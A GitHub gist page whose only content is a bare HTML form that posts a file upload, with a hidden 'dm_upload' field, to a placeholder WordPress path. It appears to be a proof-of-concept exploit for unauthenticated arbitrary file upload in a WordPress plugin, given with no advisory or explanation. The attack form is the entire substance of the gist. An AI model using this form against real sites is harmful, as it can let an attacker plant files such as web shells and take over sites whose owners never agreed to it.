Skip to content

Instantly share code, notes, and snippets.

@ichsanbahri
Created October 9, 2016 07:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ichsanbahri/1b6012bab3b4d28cbb568e862f74d930 to your computer and use it in GitHub Desktop.
Save ichsanbahri/1b6012bab3b4d28cbb568e862f74d930 to your computer and use it in GitHub Desktop.
<html>
<body>
<form action="http://[path to WordPress]" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dm_upload" />
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment